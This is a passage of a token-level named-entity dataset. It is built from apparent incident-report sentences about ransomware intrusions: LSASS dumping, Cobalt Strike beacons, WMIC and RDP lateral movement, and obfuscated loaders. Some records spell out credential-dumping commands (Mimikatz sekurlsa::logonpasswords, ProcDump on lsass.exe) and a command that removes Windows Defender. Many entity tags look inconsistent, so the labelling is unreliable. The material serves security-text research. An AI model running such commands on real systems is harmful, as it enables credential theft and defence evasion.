"AnyDesk", - "on", - "several", - "servers", - "including", - "a", - "backup", - "management", - "host,", - "likely", - "as", - "a", - "further", - "means", - "of", - "persistence", - "or", - "later", - "command", - "and", - "control." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "they", - "connected", - "to", - "a", - "domain", - "controller", - "and", - "dropped", - "three", - "scripts;", - "one", - "to", - "copy", - "the", - "ransomware", - "executable", - "to", - "all", - "hosts,", - "one", - "to", - "reset", - "every", - "users", - "password", - "in", - "the", - "organization,", - "and", - "a", - "final", - "one", - "to", - "execute", - "the", - "staged", - "ransomware", - "payload", - "using", - "PsExec" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "executing", - "it", - "via", - "a", - "remote", - "service." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "proceeded", - "to", - "dump", - "LSASS", - "memory" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ProcDump", - "was", - "used", - "to", - "dump", - "LSASS", - "memory." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "I-Features", - "B-HackOrg", - "B-Features" - ] - }, - { - "tokens": [ - "several", - "different", - "Mimikatz", - "implementations", - "were", - "executed", - "on", - "the", - "domain", - "controller,", - "including", - "a", - "Mimikatz", - "executable" - ], - "ner_tags": [ - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "There", - "were", - "several", - "variants", - "of", - "Mimikatz", - "in", - "binary", - "and", - "PowerShell", - "form" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "C:\\Windows\\system32\\cmd.exe", - "/C", - "mimikatz.exe", - "\"privilege::debug\"", - "\"sekurlsa::logonpasswords\"" - ], - "ner_tags": [ - "B-SamFile", - "B-SamFile", - "B-SamFile", - "O", - "O" - ] - }, - { - "tokens": [ - "C:\\Windows\\system32\\cmd.exe", - "/C", - "mimikatz.exe", - "privilege::debug", - "sekurlsa::logonPasswords", - "full", - "samdump" - ], - "ner_tags": [ - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Multiple", - "injections", - "into", - "the", - "LSASS", - "process", - "were", - "observed", - "on", - "multiple", - "hosts." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "LSASS", - "process", - "to", - "access", - "credentials." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Process", - "dump", - "of", - "the", - "LSASS", - "process" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "lsass.exe", - "beacon" - ], - "ner_tags": [ - "O", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "c:\\windows\\temp\\procdump64.exe", - "-accepteula", - "-ma", - "lsass.exe" - ], - "ner_tags": [ - "B-SamFile", - "B-SamFile", - "B-SamFile", - "B-SamFile" - ] - }, - { - "tokens": [ - "Several", - "more", - "beacons", - "were", - "also", - "loaded", - "on", - "the", - "host", - "using", - "DLLs", - "and", - "PowerShell." - ], - "ner_tags": [ - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "the", - "threat", - "actor", - "moved", - "on", - "to", - "downloading", - "a", - "variety", - "of", - "beacon", - "executables" - ], - "ner_tags": [ - "O", - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Way", - "O" - ] - }, - { - "tokens": [ - "to", - "execute", - "various", - "dropped", - "tools", - "or", - "beacons", - "on", - "the", - "endpoint," - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "files", - "that", - "where", - "downloaded", - "from", - "those", - "sites:" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "file", - "downloads", - "relating", - "to", - "tooling/scripts." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "threat", - "actors", - "downloaded", - "the", - "lsass.exe", - "beacon", - "from", - "their", - "attacker", - "hosted", - "infrastructure" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Lots", - "of", - "custom", - "scripts", - "dropped", - "by", - "threat", - "actors" - ], - "ner_tags": [ - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Other", - "tools", - "and", - "scripts", - "were", - "dropped", - "onto", - "one", - "endpoint" - ], - "ner_tags": [ - "O", - "O", - "O", - "B-Tool", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "threat", - "actors", - "often", - "opened", - "Internet", - "Explorer", - "to", - "download", - "their", - "beacons" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Purp", - "I-Purp", - "O" - ] - }, - { - "tokens": [ - "The", - "threat", - "actors", - "dropped", - "the", - "first", - "of", - "their", - "ransomware", - "binaries", - "on", - "the", - "fourth", - "day", - "of", - "the", - "intrusion" - ], - "ner_tags": [ - "O", - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "threat", - "actors", - "had", - "the", - "clear", - "text", - "credentials", - "for", - "one", - "of", - "the", - "domain", - "administrator", - "accounts", - "and", - "began", - "moving", - "lateral", - "to", - "other", - "systems" - ], - "ner_tags": [ - "O", - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "They", - "issued", - "remote", - "commands", - "using", - "WMIC", - "to", - "conduct", - "discovery,", - "as", - "well", - "as", - "distribute", - "and", - "execute", - "Cobalt", - "Strike", - "beacons." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "I-Tool", - "O" - ] - }, - { - "tokens": [ - "additional", - "beacons", - "executed", - "using", - "remote", - "WMIC", - "commands," - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "executed", - "using", - "remote", - "WMI", - "commands" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "use", - "of", - "WMIC", - "was", - "leveraged", - "by", - "a", - "batch", - "file" - ], - "ner_tags": [ - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "wmic", - "/node" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "Threat", - "actors", - "used", - "the", - "lolbin", - "wmic.exe", - "in", - "order", - "to", - "execute", - "PowerShell", - "Cobalt", - "Strike", - "beacons", - "on", - "multiple", - "workstations", - "and", - "servers" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Way", - "I-Tool", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "WmiPrvSe.exe", - "(WMI", - "Provider", - "Host)", - "executed", - "the", - "PowerShell", - "Cobalt", - "Strike", - "beacon", - "on", - "the", - "remote", - "computers." - ], - "ner_tags": [ - "B-Way", - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "B-Way", - "I-Tool", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "threat", - "actors", - "proceeded", - "to", - "RDP", - "to", - "the", - "domain", - "controller." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "starting", - "the", - "RDP", - "session" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "run", - "from", - "their", - "interactive", - "RDP", - "session" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "used", - "to", - "proxy", - "RDP", - "connections", - "and", - "connect", - "to", - "another", - "computer." - ], - "ner_tags": [ - "O", - "O", - "O", - "B-Way", - "O", - "O", - "I-Features", - "I-Features", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "The", - "use", - "of", - "RDP", - "was", - "extensively", - "used", - "throughout", - "the", - "intrusion,", - "using", - "a", - "variety", - "of", - "processes" - ], - "ner_tags": [ - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "I-Features", - "I-Features", - "I-Features" - ] - }, - { - "tokens": [ - "establishing", - "RDP", - "connections" - ], - "ner_tags": [ - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "During", - "these", - "RDP", - "sessions," - ], - "ner_tags": [ - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "This", - "file", - "was", - "opened", - "during", - "their", - "RDP", - "session", - "and", - "contained", - "the", - "PowerShell", - "commands", - "used", - "to", - "launch", - "a", - "new", - "beacon:" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "RDP", - "traffic", - "and", - "minimize", - "external", - "RDP", - "access" - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "RDP", - "traffic" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "They", - "then", - "opened", - "an", - "RDP", - "connection", - "back", - "to", - "the", - "primary", - "domain", - "controller" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "threat", - "actors", - "executed", - "a", - "PowerShell", - "command", - "to", - "disable", - "Windows", - "Defender", - "Antivirus", - "on", - "the", - "host" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Windows", - "Defender", - "tampering" - ], - "ner_tags": [ - "I-SecTeam", - "I-SecTeam", - "B-SecTeam" - ] - }, - { - "tokens": [ - "powershell.exe", - "Uninstall-WindowsFeature", - "-Name", - "Windows-Defender-GUI" - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "reviewed", - "Group", - "Policy", - "Objects", - "for", - "the", - "domain." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "user", - "clicked", - "on", - "the", - "ISO", - "file,", - "which", - "created", - "a", - "new", - "virtual", - "hard", - "drive", - "disk" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "when", - "the", - "victim", - "clicked", - "on", - "the", - "LNK", - "file,", - "it", - "triggered", - "the", - "execution", - "of", - "the", - "batch", - "file" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Clicking", - "on", - "the", - "LNK", - "file", - "executes", - "the", - "batch", - "file" - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "a", - "hidden", - "directory" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "located", - "in", - "a", - "hidden", - "folder" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "hidden", - "view", - "attribute", - "in", - "file", - "explorer", - "in", - "reference", - "to", - "the", - "ProgramData", - "folder." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "delivered", - "a", - "hidden", - "directory" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "ISO", - "file", - "was", - "delivered", - "as", - "a", - "ZIP", - "archive", - "via", - "a", - "malicious", - "spam", - "mail", - "campaign." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "I-OffAct", - "O" - ] - }, - { - "tokens": [ - "DLL", - "was", - "executed", - "using", - "rundll32.exe", - ":", - "C:\\Windows\\system32\\cmd.exe", - "/c", - "D:\\max\\eyewear.bat", - "➝", - "rundll32" - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "B-SamFile", - "B-SamFile", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "This", - "process", - "was", - "invoked", - "by", - "RunDLL32.exe" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "malware", - "running", - "via", - "Rundll32" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "file", - "was", - "executed", - "by", - "the", - "injected", - "Rundll32.exe", - "process." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "a", - "single", - "Rundll32.exe", - "process" - ], - "ner_tags": [ - "O", - "O", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "rundll32", - "locker_32.dll,run" - ], - "ner_tags": [ - "B-SamFile", - "B-SamFile" - ] - }, - { - "tokens": [ - "loads", - "it", - "using", - "rundll32" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "decoded", - "PowerShell", - "function" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Decoded", - "from", - "Base64:" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "A", - "scheduled", - "task", - "was", - "then", - "created", - "using", - "this", - "same", - "DLL." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "A", - "scheduled", - "task", - "was", - "created", - "at", - "that", - "time", - "to", - "maintain", - "persistence", - "on", - "this", - "host" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Purp", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "GetSystem", - "creates", - "a", - "service" - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "used", - "to", - "inject", - "a", - "new", - "beacon", - "or", - "a", - "specific", - "program", - "to", - "another", - "process", - "on", - "the", - "victim’s", - "computer." - ], - "ner_tags": [ - "O", - "O", - "B-Features", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "injection", - "is", - "also", - "visible", - "from", - "memory", - "dumps" - ], - "ner_tags": [ - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Several", - "hosts", - "showed", - "rundll32", - "processes", - "exhibiting", - "common", - "process", - "injection", - "behavior" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Code", - "injection", - "in", - "LSASS" - ], - "ner_tags": [ - "I-Way", - "I-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "an", - "injected", - "Cobalt", - "Strike", - "beacon" - ], - "ner_tags": [ - "O", - "O", - "B-Way", - "I-Way", - "I-Way" - ] - }, - { - "tokens": [ - "the", - "injected", - "Rundll32.exe", - "process." - ], - "ner_tags": [ - "O", - "O", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "The", - "common", - "processes", - "observed", - "were", - "two", - "injected", - "processes" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "a", - "beacon", - "injected", - "into", - "a", - "single", - "Rundll32.exe", - "process" - ], - "ner_tags": [ - "O", - "B-Way", - "O", - "O", - "O", - "O", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "to", - "discover", - "information", - "relating", - "to", - "the", - "user" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "host," - ], - "ner_tags": [ - "O" - ] - }, - { - "tokens": [ - "cmd.exe", - "/C", - "hostname" - ], - "ner_tags": [ - "B-SamFile", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "systeminfo" - ], - "ner_tags": [ - "O" - ] - }, - { - "tokens": [ - "systeminfo" - ], - "ner_tags": [ - "O" - ] - }, - { - "tokens": [ - "queried", - "a", - "number", - "of", - "target", - "hosts", - "to", - "determine", - "the", - "host", - "disk", - "drive", - "configuration" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "This", - "can", - "be", - "useful", - "to", - "determine", - "drives,", - "including", - "mounted", - "network", - "shares." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "I-Features", - "O", - "O", - "O", - "B-Features", - "O" - ] - }, - { - "tokens": [ - "logicaldisk", - "get", - "caption,description,drivetype,providername,volumename" - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features" - ] - }, - { - "tokens": [ - "network", - "configuration" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "ipconfig", - "/all" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "ipconfig" - ], - "ner_tags": [ - "O" - ] - }, - { - "tokens": [ - "C:\\Windows\\system32\\cmd.exe", - "/C", - "dir", - "/s", - "*file/" - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "threat", - "actors", - "used", - "the", - "dir", - "command" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "C:\\Windows\\System32\\cmd.exe", - "/C", - "dir" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "This", - "was", - "double", - "base64", - "encoded." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PowerShell", - "Base64", - "encoded", - "string:", - "The", - "-e", - "is", - "short", - "for", - "-EncodedCommand." - ], - "ner_tags": [ - "B-SamFile", - "B-SecTeam", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "base64", - "encoding", - "starts", - "with", - "JAB", - "that", - "is", - "a", - "common", - "pattern", - "for", - "UTF-16", - "starting", - "with", - "$" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PowerShell", - "encoded", - "commands:" - ], - "ner_tags": [ - "B-SamFile", - "O", - "O" - ] - }, - { - "tokens": [ - "powershell", - "-np", - "-w", - "hidden", - "-encodedcommand" - ], - "ner_tags": [ - "B-SamFile", - "B-SamFile", - "B-SamFile", - "O", - "O" - ] - }, - { - "tokens": [ - "used", - "to", - "proxy" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Proxying", - "RDP", - "traffic", - "via", - "a", - "processes", - "such", - "as", - "a", - "Cobalt", - "Strike", - "beacon", - "reduces", - "the", - "exposure", - "of", - "the", - "threat", - "actor’s", - "own", - "infrastructure,", - "and", - "blends", - "RDP", - "activity", - "to", - "those", - "of", - "internal", - "hosts", - "on", - "the", - "network." - ], - "ner_tags": [ - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "B-Org", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "threat", - "actors", - "made", - "attempts", - "to", - "proxy", - "RDP", - "traffic" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "the", - "RDP", - "traffic", - "was", - "being", - "proxied", - "through" - ], - "ner_tags": [ - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "attempted", - "to", - "masquerade", - "dropped", - "files", - "as", - "legitimate", - "Microsoft", - "Windows", - "executables" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Once", - "the", - "file", - "was", - "unpacked" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "documents", - "were", - "exfiltrated", - "over", - "one", - "of", - "the", - "encrypted", - "C2", - "channels." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "When", - "the", - "payload", - "was", - "executed,", - "there", - "were", - "some", - "telltale", - "registry", - "events", - "observed" - ], - "ner_tags": [ - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "files", - "were", - "then", - "deleted" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "packed", - "versions", - "uploaded", - "to", - "VT" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "pack", - "the", - "code’s", - "dependencies", - "into", - "the", - ".NET", - "assembly", - "so", - "it", - "can", - "run", - "self-contained." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "compression", - "using", - "QuickLZ" - ], - "ner_tags": [ - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "with", - "names", - "invoking", - "popular", - "videogames", - "such", - "as", - "Fortnite,", - "Valorant,", - "Roblox", - "or", - "Warzone2." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Way", - "B-Way", - "O", - "B-Idus" - ] - }, - { - "tokens": [ - "create", - "a", - "legitimate", - "looking", - "folder", - "to", - "drop", - "an", - "illicit", - "version", - "of", - "the", - "System", - "Configuration", - "Utility", - "msconfig.exe" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "creates", - "the", - "folder", - "“C:Windows", - "System32”,", - "with", - "a", - "space", - "after", - "Windows" - ], - "ner_tags": [ - "B-Features", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "packaged", - "into", - "an", - "obfuscated", - "PowerShell", - "batch", - "file" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "heavily", - "obfuscated", - "batch", - "file", - "is", - "hidden", - "and", - "automatically", - "executed", - "when", - "launched." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "script", - "extracts", - "two", - "separate", - "binaries", - "from", - "the", - "base64", - "encoded", - "text" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "another", - "obfuscated", - "binary", - "carrying", - "an", - "embedded", - "resource" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "extraction", - "of", - "the", - "resources", - "leads", - "to", - "the", - "final", - "payloads" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Option", - "to", - "embed", - "additional", - "malware", - "to", - "be", - "executed" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "rootkit’s", - "DLL", - "that", - "is", - "embedded", - "as", - "a", - "resource" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "fileless", - "and", - "executed", - "only", - "in", - "memory", - "after", - "going", - "through", - "several", - "decryptions", - "and", - "decompression", - "routines" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "AES", - "decrypts,", - "and", - "GZIP", - "decompresses", - "it", - "to", - "produce", - "two", - "separate", - "byte", - "arrays" - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "will", - "be", - "decompressed", - "and", - "decrypted" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "decompress", - "and", - "decrypt", - "the", - "final", - "payload" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Hooks", - "several", - "functions", - "from", - "ntdll.dll", - "to", - "hide", - "its", - "presence." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "leveraging", - "Windows", - "Management", - "Instrumentation", - "(WMI)", - "to", - "identify", - "the", - "system’s", - "manufacturer." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "identify", - "the", - "system’s", - "manufacturer" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "delivered", - "to", - "the", - "victim,", - "commonly", - "through", - "a", - "phishing", - "mail" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "I-Way" - ] - }, - { - "tokens": [ - "receives", - "a", - "ZIP", - "file", - "containing", - "a", - "benign", - "file", - "in", - "plain", - "sight" - ], - "ner_tags": [ - "O", - "O", - "I-SamFile", - "I-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "automatically", - "executed", - "when", - "launched." - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "bat", - "file", - "format" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "spawned", - "with", - "PowerShell", - "via", - "Task", - "Scheduler" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "using", - "PowerShell." - ], - "ner_tags": [ - "O", - "B-Way" - ] - }, - { - "tokens": [ - "base64", - "encoded", - "text", - "later", - "in", - "the", - "file" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "more", - "obfuscation", - "and", - "encryption", - "techniques", - "that", - "lead", - "to", - "the", - "final", - "payload." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "stored", - "as", - "obfuscated", - "data", - "in", - "the", - "registry" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "prefix", - "is", - "used", - "to", - "hide", - "files,", - "directories,", - "NamedPipes,", - "scheduled", - "tasks,", - "processes,", - "registry", - "keys/values,", - "and", - "services." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "I-Features", - "O", - "B-HackOrg", - "B-Way", - "I-Features", - "O", - "B-Features", - "I-Features", - "O", - "O", - "B-Features" - ] - }, - { - "tokens": [ 